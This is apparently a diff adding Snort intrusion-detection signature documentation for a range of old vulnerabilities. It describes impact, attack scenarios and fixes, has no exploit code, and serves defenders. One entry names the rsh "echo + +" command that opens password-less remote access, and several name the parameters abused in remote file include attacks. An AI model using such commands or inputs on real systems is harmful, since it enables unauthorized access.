+++ b/doc/signatures/2946.txt
@@ -0,0 +1,68 @@
+Rule:
+
+--
+Sid:
+2946
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft Network Dynamic Data Exchange (NetDDE)
+services.
+
+--
+Impact:
+Serious. Execution of arbitrary code with system level privileges
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft NetDDE that may allow an attacker to
+run code of their choosing with system level privileges. A programming
+error in the handling of network messages may give an attacker the
+opportunity to overflow a fixed length buffer by using a specially
+crafted NetDDE message.
+
+This service is not started by default on Microsoft Windows systems, but
+this issue can also be exploited locally in an attempt to escalate
+privileges after a successful attack from an alternate vector.
+
+--
+Affected Systems:
+	Microsoft Windows NT, 2000, 2003, XP, 98 and ME systems.
+
+--
+Attack Scenarios:
+An attacker needs to craft a special NetDDE message in order to overflow
+the affected buffer.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Disable the NetDDE service.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Microsoft Security Bulletin MS04-031:
+http://www.microsoft.com/technet/security/bulletin/ms04-031.mspx
+
+--
--- /dev/null
+++ b/doc/signatures/1348.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+1341
+
+--
+Summary:
+Attempted g++ command access via web
+
+--
+Impact:
+Attempt to compile a binary on a host.
+
+--
+Detailed Information:
+This is an attempt to compiile a C or C++ source on a host. The g++
+command is theGNU project's C and C++ compiler used to compile C and
+C++ sourcefiles into executable binary files. The attacker could
+possibly compilea program needed for other attacks on the system or
+install abinary program of his choosing.
+
+--
+Attack Scenarios:
+The attacker can make a standard HTTP request that contains 'g++'in the URI.
+
+--
+Ease of Attack:
+Simple HTTP request.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+Webservers should not be allowed to view or execute files and binaries
+outside of it'sdesignated web root or cgi-bin. This command may also
+be requested on acommand line should the attacker gain access to the
+machine. Wheneverpossible, sensitive files and certain areas of the
+filesystem shouldhave the system immutable flag set to prevent files
+from being addedto the host. On BSD derived systems, setting the
+systems runtimesecurelevel also prevents the securelevel from being
+changed. (note: thesecurelevel can only be increased).
+--
+Contributors:
+Sourcefire Research Team
+
+-- 
+Additional References:
+sid: 1342
+sid: 1343
+sid: 1344
+sid: 1345
+sid: 1346
+sid: 1347
+sid: 1348
+
+--
--- /dev/null
+++ b/doc/signatures/1149.txt
@@ -0,0 +1,68 @@
+Rule:  
+
+--
+Sid:
+1149
+
+--
+Summary:
+This event is generated when an attempt is made to access Wwwcount 
+(count.cgi), a very popular CGI program used to track website usage.
+
+--
+Impact:
+Will allow access as with the privileges of the user running the 
+process.
+
+--
+Detailed Information:
+In particular, it enumerates the number of hits on given webpages and 
+increments them on a 'counter'. In October of 1997 two remotely 
+exploitable problems were discovered with this program. The first 
+problem was somewhat innocuous in that it only allowed remote users to 
+view .GIF files they were not supposed to have access to. This may be 
+dangerous if the site contains sensitive data in .GIF files such as 
+demographic/financial data in charts etc.
+
+The second and most serious problem is a buffer overflow in QUERY_STRING
+enviroment variable handled by the program. In essence a remote user can
+send an overloy long query to the program and overflow a buffer in order
+to execute their own commands as whatever privilege level the program is
+running as.
+
+--
+Attack Scenarios:
+Simple HTTP GET request.
+
+--
+Ease of Attack:
+Simple. Exploit code available
+
+--
+False Positives:
+A none vulnerable version of the application will generate events as the
+rule only looks for access to count.cgi during a established connection.
+
+--
+False Negatives:
+
+--
+Corrective Action:
+If you are running version 2.3 of Wwwcount it is suggested you upgrade 
+immediately. In the meantime you may wish to consider removing the 
+execution bit on this program. Versions 2.4 and above of this software 
+are available at: 
+
+http://www.fccc.edu/users/muquit/Count.html 
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Neal Timm <nealtimm@sbcglobal.net>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000530.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+100000530
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site 
+scripting vulnerability in the "NC Linklist" application running on a webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site 
+scripting vulnerability via the "view" parameter in the "index.php" script used 
+by the "NC Linklist" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to retrieve sensitive data, execute system binaries 
+or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using NC Linklist
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a 
+user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
--- /dev/null
+++ b/doc/signatures/608.txt
@@ -0,0 +1,58 @@
+Rule: 
+
+--
+Sid: 608
+
+--
+Summary: 
+This event is generated when an attempt to modify access control permissions for remote shell logins is attempted.
+
+--
+Impact: 
+An attacker may have modified remote login permissions such that any host is allowed to initiate a remote session on the target host.
+
+-- 
+Detailed Information: 
+The rule generates an event when system reconfiguration is attempted via "rsh". 
+
+The command "echo + +" is used to relax access control permissions for r-services to allow access from any site without the need for password authentication. 
+
+This activity is indicative of attempts to abuse hosts using a default configuration. 
+
+Some UNIX systems use the "rsh" service to allow a connection to the machine for establishing an interactive session.
+
+--
+Attack Scenarios: 
+An attacker finds a machine with "rsh" enabled and reconfigures it to allow access from any location
+
+--
+Ease of Attack: 
+Simple, no exploit software required
+
+--
+False Positives: 
+None Known
+
+--
+False Negatives: 
+None Known
+
+--
+Corrective Action: 
+Investigate logs on the target host for further details and more signs of suspicious activity
+
+Use ssh for remote access instead of rlogin.
+
+--
+Contributors: 
+Original rule by Max Vision <vision@whitehats.com> modified from a signature written by Ron Gula
+Snort documentation contributed by Anton Chuvakin <http://www.chuvakin.org>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+http://www.whitehats.com/info/IDS388
+
+--
--- /dev/null
+++ b/doc/signatures/2568.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+2568
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/382.txt
@@ -0,0 +1,56 @@
+Rule:
+
+--
+Sid:
+382
+
+--
+Summary:
+This event is generated when an ICMP echo request is made from a Windows 9x or 2000 host. 
+
+--
+Impact:
+Information gathering.  An ICMP echo request can determine if a host is active.
+
+--
+Detailed Information:
+An ICMP echo request is used by the ping command to elicit an ICMP echo reply from a listening live host.  An echo request that originates from a Windows 9x or 2000 host contains a unique payload in the message request.
+
+--
+Affected Systems:
+All
+
+--
+Attack Scenarios:
+An attacker may attempt to determine live hosts in a network prior to launching an attack.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+An ICMP echo request may be used to legimately troubleshoot networking problems.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Block inbound ICMP echo requests.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.org>
+Documented by Steven Alexander<alexander.s@mccd.edu>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS169
+
+--
--- /dev/null
+++ b/doc/signatures/845.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+845
+
+--
+Summary:
+This event is generated when an attempt is made to exploit an 
+authentication vulnerability in a web server or an application running
+on that server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a web server or an application running ona web server. Some
+applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An attacker can access the authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Disallow administrative access from sources external to the protected
+network.
+
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1695.txt
@@ -0,0 +1,70 @@
+Rule:  
+
+--
+Sid: 1695
+
+-- 
+
+Summary: 
+This event is generated when a command is issued to an Oracle database server that may result in a serious compromise of the data stored on that system.
+
+-- 
+Impact: 
+Serious. An attacker may have gained superuser access to the system.
+
+--
+Detailed Information:
+This event is generated when an attacker issues a special command to an Oracle database that may result in a serious compromise of all data stored on that system.
+
+Such commands may be used to gain access to a system with the privileges of an administrator, delete data, add data, add users, delete users, return sensitive information or gain intelligence on the server software for further system compromise.
+ 
+This connection can either be a legitimate telnet connection or the result of spawning a remote shell as a consequence of a successful network exploit. 
+
+Oracle servers running on a Windows platform may listen on any arbitrary
+port. Change the $ORACLE_PORTS variable in snort.conf to "any" if this
+is applicable to the protected network.
+
+--
+
+Attack Scenarios: 
+Simple. These are Oracle database commands.
+
+-- 
+
+Ease of Attack: 
+Simple.
+
+-- 
+
+False Positives: 
+This event may be generated by a database administrator logging in and issuing database commands from a location outside the protected network.
+
+--
+False Negatives:
+Configure your ORACLE_PORTS variable correctly for the environment you are in. 
+In many situations ORACLE negotiates a communication port. This means that 1521 
+and 1526 are not used for communication during the entire transaction. A new 
+port is negotiated after the initial connect message, all communication after 
+that uses this other port. If you are in an environment such as this, you should 
+set ORACLE_PORTS to "any" in snort.conf. 
+ 
+Otherwise, there are no known false negatives.
+
+-- 
+
+Corrective Action: 
+Use a firewall to disallow direct access to the Oracle database from sources external to the protected network.
+Ensure that this event was not generated by a legitimate session then investigate the server for signs of compromise
+
+Look for other events generated by the same IP addresses.
+
+--
+Contributors: 
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/853.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+853
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000319.txt
@@ -0,0 +1,78 @@
+
+
+Rule:
+
+--
+Sid:
+100000319
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "ActualScripts" application running on a 
+webserver. Access to the file "direct.php" using a remote file being passed as 
+the "rf" parameter may indicate that an exploitation attempt has been 
+attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "rf" parameter in the "direct.php" script used by the 
+"ActualScripts" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using ActualScripts
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/2228.txt
@@ -0,0 +1,62 @@
+Rule:  
+
+--
+Sid:
+2228
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in phpMyAdmin.
+
+--
+Impact:
+Varies. Information disclosure, Cross site scripting, unauthorized 
+access, directory traversal.
+
+--
+Detailed Information:
+Multiple versions of the PHP application phpMyAdmin suffer from many 
+known vulnerabilities that can lead to information disclosure, cross 
+site scripting attacks and unauthorized access to the application.
+
+--
+Affected Systems:
+	phpMyAdmin 2.0, 2.0.1 to 2.0.5
+	phpMyAdmin 2.1, 2.1.1, 2.1.2
+	phpMyAdmin 2.2.2 to 2.2.6
+	phpMyAdmin 2.3.1, 2.3.2
+	phpMyAdmin 2.4.0, 2.5.0, 2.5.1
+
+--
+Attack Scenarios:
+The attacker can utilize a directory traversal technique to disclose 
+information in a sensitive system file, then use that information to 
+propagate further attacks against the system.
+
+--
+Ease of Attack:
+Simple. No exploit software is required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000414.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000414
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "REDAXO" application running on a webserver. Access to the file "community.inc.php" using a remote file being passed as the "REX[INCLUDE_PATH]" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "REX[INCLUDE_PATH]" parameter in the "community.inc.php" script used by the "REDAXO" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using REDAXO
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/2878.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2878
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure alter_site_priority
+. This procedure is included in
+sys.dbms_repcat_conf.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/339.txt
@@ -0,0 +1,95 @@
+Rule:  
+
+--
+Sid:
+339
+
+--
+Summary:
+
+--
+Impact:
+Severe; This is a remote exploit that could result in a root compromise.
+
+--
+Detailed Information:
+There is an off-by-one error in the replydirname() function in the BSD FTP deamon which is also present in many derivitave works.  This vulnerability allows an attacker to overflow the buffer by one byte, overwriting the first byte of the return pointer on the stack.
+
+--
+Affected Systems:
+	BSD ftpd 0.3.2
+	 + Progeny Debian 1.0
+	David A. Holland linux-ftpd 0.17
+	 + Progeny Debian 1.0
+	David Madore ftpd-BSD 0.2.3
+	  - Caldera OpenLinux 2.2
+	  - Caldera OpenLinux 2.3
+	  - Caldera OpenLinux 2.4
+	  - Debian Linux 2.0
+	  - Debian Linux 2.1
+	  - Debian Linux 2.2
+	  - Debian Linux 2.3
+	  - MandrakeSoft Linux Mandrake 6.0
+	  - MandrakeSoft Linux Mandrake 6.1
+	  - MandrakeSoft Linux Mandrake 7.0
+	  - MandrakeSoft Linux Mandrake 7.1
+	  - MandrakeSoft Linux Mandrake 7.2
+	  - RedHat Linux 5.0
+	  - RedHat Linux 6.0 x
+	  - RedHat Linux 7.0
+	  - Slackware Linux 4.0
+	  - Slackware Linux 7.0
+	  - Slackware Linux 7.1
+	NetBSD NetBSD 1.4
+	NetBSD NetBSD 1.4.1
+	NetBSD NetBSD 1.4.2
+	NetBSD NetBSD 1.5
+	OpenBSD 2.4
+	OpenBSD 2.5
+	OpenBSD 2.6
+	OpenBSD 2.7
+	OpenBSD 2.8
+Note: OpenBSD ships with the FTP daemon turned off, so this is not on by default.
+
+--
+Attack Scenarios:
+The attacker could log into a vulnerable OpenBSD anonymous FTP server, calculate the buffer size, fill the buffer and over write the lowest byte on the base pointer with a null byte.  This would result in the attacker controling that space on the stack, with full access to control the host at will.
+
+--
+Ease of Attack:
+Simple; there are script versions of this exploit in the wild.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Update your machine to the latest version of OpenBSD.  If you are running OpenBSD 2.8, use the following patch: http://www.securityfocus.com/data/vulnerabilities/patches/005_ftpd.patch
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Mike Poor <mike.poor@sourcefire.com>
+
+-- 
+Additional References:
+
+Arachnids
+http://www.whitehats.com/info/IDS446
+
+Bugtraq
+http://www.securityfocus.com/bid/2124
+
+CVE
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0053
+
+OpenBSD
+http://www.openbsd.org/errata28.html#ftpd
+
+--
--- /dev/null
+++ b/doc/signatures/589.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+589
+
+--
+Summary:
+This event is generated when an attempt is made through a portmap GETPORT request to discover the port where the Remote Procedure Call (RPC) yppasswd is listening.
+
+
+--
+Impact:
+Information disclosure.  This request is used to discover which port yppasswd is using.  Attackers can also learn what versions of the yppasswd protocol are accepted by yppasswd. 
+
+--
+Detailed Information:
+The portmapper service registers all RPC services on UNIX hosts. It can be queried to determine the port where RPC services such as yppasswd run.  The yppasswd RPC service handles password change requests from the yppasswd client program.  This client program is used to change a user password in Network Information Service (NIS) environments where a centralized database exists to distribute passwords throughout a network.  Multiple vulnerabilities are associated with the yppasswd RPC service.
+
+--
+Affected Systems:
+All hosts running the UNIX portmapper.
+
+--
+Attack Scenarios:
+An attacker can query the portmapper to discover the port where yppasswd runs.  This may be a precursor to querying yppasswd for usage statistics.
+
+--
+Ease of Attack:
+Easy.  
+
+--
+False Positives:
+If a legitimate remote user is allowed to access yppasswd, this rule may trigger.
+
+--
+False Negatives:
+This rule detects probes of the portmapper service for yppasswd, not probes of the yppasswd service itself. Because RPC services often listen on fairly arbitrary ports, it may not be possible to detect misuses of the yppasswd service itself. An attacker may attempt to go directly to the yppasswd port without querying the portmapper service, which would not trigger the rule.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to RPC-enabled machines. 
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS14
+
+
+--
--- /dev/null
+++ b/doc/signatures/100000434.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000434
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "BlueShoes" application running on a webserver. Access to the file "Bs_ImageArchive.class.php" using a remote file being passed as the "APP[path][core]" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "APP[path][core]" parameter in the "Bs_ImageArchive.class.php" script used by the "BlueShoes" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using BlueShoes
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/869.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+869
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3382.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3382
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2236.txt
@@ -0,0 +1,64 @@
+Rule:  
+
+--
+Sid:
+2236
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer 
+overflow in Trend Micro InterScan eManager.
+
+--
+Impact:
+Serious. Remote administrative access is possible.
+
+--
+Detailed Information:
+Versions of Trend Micro InterScan eManager suffer from a buffer overflow
+condition that can present an attacker with the opportunity to execute 
+arbitrary code of their choosing which could lead to remote access to 
+the server.
+
+--
+Affected Systems:
+	Trend Micro InterScan eManager 3.51
+
+--
+Attack Scenarios:
+If the buffer overflow condition is met, the attacker can run code of 
+their choosing on the affected host.
+
+--
+Ease of Attack:
+Moderate.
+
+--
